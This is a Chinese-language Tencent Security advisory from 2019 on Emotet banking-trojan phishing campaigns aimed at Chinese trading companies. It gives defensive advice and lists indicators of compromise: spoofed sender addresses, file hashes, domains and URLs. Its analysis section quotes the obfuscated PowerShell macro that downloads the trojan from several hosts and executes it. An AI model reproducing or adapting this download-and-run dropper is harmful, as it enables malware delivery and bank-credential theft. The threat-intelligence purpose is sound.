产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
一站式等保服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
品牌保护解决方案
高防云主机安全解决方案
腾讯安心平台解决方案
行业场景方案
游戏安全场景方案
电商安全场景方案
智慧零售场景方案
智慧出行场景方案
安全专项解决方案
勒索病毒专项解决方案
重大保障安全解决方案
- NEW最新动态
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
证书查询
联系我们
产品方案咨询
寻求市场合作
友情链接
腾讯云
- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
腾讯安全预警:Emotet银行木马针对国内企业的攻击增加
2019-09-27 07:29:50
一、背景
Emotet具有用于进行银行欺诈的模块,主要针对德国,奥地利和瑞士的银行进行攻击,多年来,该恶意软件被全球安全厂商归类为银行木马。近期,腾讯安全御见威胁情报中心监测到Emotet银行木马针对国内的攻击呈明显上升趋势,从事进出口贸易的企业是Emotet银行木马的主要目标。
此次攻击具有以下特点:
1.钓鱼邮件利用恶意宏代码下载攻击载荷;
2.钓鱼邮件使用德语、西班牙语、波兰语、英语等多种语言;
3.攻击者伪造大量虚假邮箱作为发件人(超过100个,详见IOCs);
4.攻击载荷Emotet会继续下载其他银行木马作为Payload;
5.银行木马能够检测用户银行登录行为,通过读取隐私数据获取账号密码登录信息,甚至通过注入恶意代码到交互页面,从而在用户进行网银相关操作时盗取帐户资产。
部分受攻击企业如下:
根据腾讯安全御见威胁情报中心统计数据,Emotet针对国内的钓鱼邮件攻击最严重地区为广东省、北京市、上海市、江苏省等地。该病毒影响的地区分布如下:
从病毒攻击影响的行业来看,受害最严重的是传统制造业、教育咨询(特别是国际教育)、商务贸易。具体受影响行业分布如下:
二、详细分析
攻击者构造大量虚假发件人(完整列表见IOCs):
gmarin@coopetico.co.cr
shyder@npvstaffing.com
sandramansilla@ciacbolivia.com
shop@jubinordic.ch
c.roosen@admvalue.fr
sales@premelectricals.net
shahidsattar@ekadacorporation.com
almacen@nourbistro.com
gsantana@ciproteo.com.mx
Bryany.Backshall@barnardandbrough.co.uk
harendra.k@idctechnologies.com
ivaca@nunezserrano-asociados.com
almacen@coenplas.com
taiyathurai@pariscountryclub.com
engineeringpune2@polyplasticsindia.com
subhasri.parida@sysnetglobal.com
betty-adam@orange.fr
fpatel@pharmanovamw.com
snehal.kakkad@bmw-infinitycars.in
ram.gopal@gfl.co.in
。。。
钓鱼邮件使用德语、西班牙语、波兰语、英语等多种语言。
德语:
西班牙语:
英语:
邮件主题通常涉及交易,付款和发票。包括:“ ACH付款信息”,“付款通知”,“发票交易”,“逾期付款”,“已付款发票”,“销售发票”,“状态更新”,“所需文件”,“新订单” ,“收据”。
有意思的是,我们在溯源过程中还发现了某精密仪器制造公司georgfischer收到的来自邮件服务商ix.netcom.com的威胁告警邮件,邮件提醒该公司警惕正在发生的攻击。
邮件标题及译文如下:
Attention! - Please be careful with email attachments. A Virus - Trojan attack is currently under way (TA542:)
译文:
注意!-请小心电子邮件附件。病毒-特洛伊木马正在进行攻击(TA542:)
根据对应的官网介绍,被警告的公司georgfischer创建于1802 年,总部位于瑞士,在 33 个国家经营着140家公司,其中57家是生产基地,业务覆盖液体气体安全输送、轻质铸造件以及高精度制造技术等领域,是一家跨国集团公司。
Georgfischer的相关人员在收到邮件服务商的提醒邮件后,又将邮件文件打包发给了德国电信公司旗下网络安全公司t-systems.com,并请求该公司将攻击邮件的发件人使用的邮箱锁定,以期达到防御目标。
邮件内容及译文如下:
Dear helpdesk,
Dear Janos
Kindly check whether fraud attack and block this sender
Best Helmut
译文:
Dear helpdesk,
Dear Janos
请检查是否有欺诈攻击并阻止此发件人
Best Helmut
被求助的t-systems是德国电信(DeutscheTelekom)子公司,该公司提供网络基础设施服务。
我们捕获到攻击者使用的钓鱼邮件附件文档名如下:
SCAN_5PYSF6A1BR.doc
DOC_NPKICRA3C6LQW9Y_ACD.doc
Dok_393027_2112976231.rtf
Santander 682634154514193.doc
INF_XOUZRYAJ7TZ9G6J_18092019.doc
Alb.525.doc
DOK_62597273590_A.doc
055843559 factura septiembre.doc
INF_931516975144_B.doc
附件文档中均附带恶意的宏代码:
宏代码利用Powershell下载银行木马emotet,下载时使用的URL地址以“@”分割记录,其中的5个地址会被依次请求进行下载。
$DIiMMwdP='pw79UV5N';$r89Bqv9M = '523';$z1oZiDj='Ol_qmEC';$Lj6JlLHz=$env:userprofile+'\'+$r89Bqv9M+'.exe';
$qt4En6DB='R3vqiSFT';$CiILkHUo=.('ne'+'w-ob'+'ject') neT.wEbCLIENt;$qWG_jzZV='
http[:]//shael.org/hosting/TYXchcKkHz/
@http[:]//www.lottizzazionesavarra.it/wp-admin/zMifZDPur/
@https[:]//herrenmode.tk/5usqjlew/ttg22zcf_q5chov-377215/
@http[:]//nfbio.com/img/upload_Image/edm/pic_2/u6q4ucq7_hyg8uzhh-369963559/
@http[:]//endofhisrope.net/2008-08_PSBearDonate/qmiuOZvDj/'."Sp`LiT"('@');$lt5rEpMz='NTMPsFi';
foreach($AkOZPzW in $qWG_jzZV){try{$CiILkHUo."dO`w`Nl`oAdfile"($AkOZPzW, $Lj6JlLHz);$lWdD4O='vbXhwM6';If ((&('Get-'+'I'+'tem') $Lj6JlLHz)."L`eNgTH" -ge 24814) {[Diagnostics.Process]::"STa`Rt"($Lj6JlLHz);$K_0tQwob='a9dvKGGb';break;$BcRHRV4='FSAmRV6'}}catch{}}$ErZcNH='wnWqFd_a'
下载emotet网络流量如下:
早期版本的Emotet具有银行欺诈模块,主要针对银行进行攻击。更高版本的Emotet不再加载其自己的银行木马模块,而是加载第三方银行木马恶意软件。
Emotet收集系统信息,加密后发送至服务器,然后继续下载第三方载荷,包括Qbot,The Trick,IcedID和Gootkit等木马。
这些银行木马最终通过检测用户网银登录行为,通过读取隐私数据获取账号密码信息,甚至通过注入恶意代码到交互页面,从而在用户的银行相关操作过程时盗取账户资产及机密信息。
三、安全建议
1、我们建议企业邮箱网管根据本文末尾提供的IOCs信息,将危险发件人邮箱设置为黑名单;
2、建议企业通过培训,教育员工不要打开不明来源的邮件附件,对于附件中的文件要谨慎打开,如果附件是可执行程序,一定不要随意运行;
3、升级office系列软件到最新版本,及时修复office组件漏洞,除非确认文档来源可靠,否则不要启用宏;
4、推荐部署腾讯御点终端安全管理系统防御病毒木马攻击;
5、使用腾讯御界高级威胁检测系统检测未知黑客的各种可疑攻击行为。御界高级威胁检测系统,是基于腾讯反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统;
IOCs
发件邮箱
gmarin@coopetico.co.cr
shyder@npvstaffing.com
sandramansilla@ciacbolivia.com
shop@jubinordic.ch
c.roosen@admvalue.fr
sales@premelectricals.net
shahidsattar@ekadacorporation.com
almacen@nourbistro.com
gsantana@ciproteo.com.mx
Bryany.Backshall@barnardandbrough.co.uk
harendra.k@idctechnologies.com
ivaca@nunezserrano-asociados.com
almacen@coenplas.com
taiyathurai@pariscountryclub.com
engineeringpune2@polyplasticsindia.com
subhasri.parida@sysnetglobal.com
betty-adam@orange.fr
fpatel@pharmanovamw.com
snehal.kakkad@bmw-infinitycars.in
ram.gopal@gfl.co.in
pam.hulls@emilbraun.com.au
finance@sabena.co.id
info@workwearworld.net
rezervasyon@livsuit.com
antoinette@robsmail.co.za
facturanexus@extremetechcr.com
nilda.munoz@markas.com.bo
compras@gfr.com.mx
buchhaltung@gaertnerei-saarlouis.de
posventa@andrescarrasco.net
jaleman@texcaz.com
omar.diaz@mtpsanluis.com
tom_guoyu@163.com
print@copyedge.com
reservation@ritajtravel.com
ppspune@polyplasticsindia.com
sushma@componentbuy.com
nahla@elamanaco.com
recruitment@muditaapp.com
rjohns@smithcastings.com
blog@simon-bureau.com
hkeller@meosag.ch
bjoy@fibrexholding.com
cuentasporpagar@liorcosmetics.com
cihan@pursan.net
international_22@wisewaymail.com
aguerrero@geo4wd.com
david@eigbox.net
reservation@sailomhotelhuahin.com
international_61@wisewaymail.com
md.mustak@yourhostingaccount.com
nsirsat@xdbscorp.net
gcorrales@geo4wd.com
workorder@dentalfixrx.com
ahmadali@kohatcement.com
iletisim@zinbelgelendirme.com
salmancucs@suzukipakpattan.com
ascdelcerro@poligonosancristobal.com
kultura@poczta.kartuzy.pl
rana@e-enggltd.com
biju@petronengineering.com
valuacion.elrosedal@saicc.com.mx
hkeller@regio-werb.ch
info@cda-teq.ca
kiki@shinesra.com
ljunkin@southerncare.org
info@hawksprairiedental.com
tayyab@watt-techs.com
tracy.watson@leadsventures.com
jianfei727@163.com
camed@microtelgsi.com
rudhra@resilienceit.com
b.miller@duquesnemo.org
yasser.habib@hbfcl.com
cotech.bilaspur@renault-india.com
mnathan@fibrexholding.com
darshana.jogale@bncinfotech.in
dzfp2018@51fapiao.cn
asociacion@poligonosancristobal.com
Hamid.mobariz@tbcc.com.af
oilgas@speakerresearch.org
michael@firstmedicalexperts.com
anil@sqexperts.com
dana@a1sheetmetaltulsa.com
joswalt@surgerycentermountdora.com
pdelarosa@grupoeif.com
info@efeaksesuar.com
clyton@ledcarrental.co.zw
eastgate.admin@mikeskitchen.co.za
administracion@transportestta.com.mx
cairo1@vapegypt.com
wmoore@summervista.com
khaled.osman@almarasemsales.com
w.chavez@grupoaceves.com
jason@bjnubway.com
servicio@sortercash.com
haigen.deng@faw-vw.com
xh_wangpeng@163.com
schiodo@sierravalleyhomecorp.com
admin-khi@sanalogistics.com
dbaskerville@aactionmovers.com
fares.dayoub@nncompany.co
rcolon@delcerro.com.do
administracion@lacasadelasaberturas.com.ar
tcspeedy@speedy.com.ec
info@willmarfarmcenter.com
fabrice.scmd@orange.fr
tocallaghan@cnicholls.co.uk
tesoreria@coinpa.com.py
parts.shahjahanpur@renault-india.com
contactus@melrosebeach-apts.com
facturaelectronica@extremetechcr.com
facturasc@extremetechcr.com
donna@texasgastransport.com
mathias@swedimport.se
DOC(钓鱼邮件附件文件)
69163d86ceec013b59fc929cee88e07a
7b14e01fe4fe705a3add1a9d1c3aba42
00f502fb9fdc87e892b6f13260c5dde5
dd29f94772fec370c9fe01efb6d9ae47
6e5334da4bf6e579eb227ddba9c96e48
2c5ef063217fb3989bbe464265b5c894
f273d0014aaf58ed56a557b0531f339a
29df0bb5c6d77bd88eba85409f4f9172
82f0ee5d0f009f989e0ab3f9fe37aa86
d04617c9f25d729e7db52cc009e175d0
d206d5bd7fd0f9218ddab766de9d326a
e013e8ac575eeab6195caf07085098bc
2f2b014b7348a9aa3b1ccddf5b20be56
ba8533dcc3053527a08afafdab094373
ba222b5181a1429511c061176503cad7
64be822e76a6c19e2e11e22cb755e1b8
9de79dfc8de476a5f3908f934b33a937
fe8c07e33eadafab80e9a8e1351eee0d
Emotet
4f34a0fcc16ae643624d1f5a7d048a99
d27f692276898374f578ab6d207ab063
Domain
shael.org
lottizzazionesavarra.it
nfbio.com
herrenmode.tk
endofhisrope.net
IP
190.106.97.230
186.75.241.230
URL
http[:]//shael.org/hosting/TYXchcKkHz/
http[:]//shael.org/cgi-sys/suspendedpage.cgi
http[:]//www.lottizzazionesavarra.it/wp-admin/zMifZDPur/
http[:]//nfbio.com/img/upload_Image/edm/pic_2/u6q4ucq7_hyg8uzhh-369963559/
https[:]//herrenmode.tk/5usqjlew/ttg22zcf_q5chov-377215/
http[:]//endofhisrope.net/2008-08_PSBearDonate/qmiuOZvDj/
http[:]//190.106.97.230/report/health/add/merge/
http[:]//186.75.241.230/img/jit/xian/
http[:]//186.75.241.230/glitch/enabled/
参考链接:
腾讯安全以腾讯安全大脑为核心,构建了一套自适应的闭环安全防护体系,包含基础安全防护体系,安全运营中心、业务安全服务体系等,其产品矩阵涉及终端安全、网络安全、云安全、业务安全、数据安全、安全管理、安全服务等多个方向。
更多信息,请访问:https://s.tencent.com
在线咨询
方案定制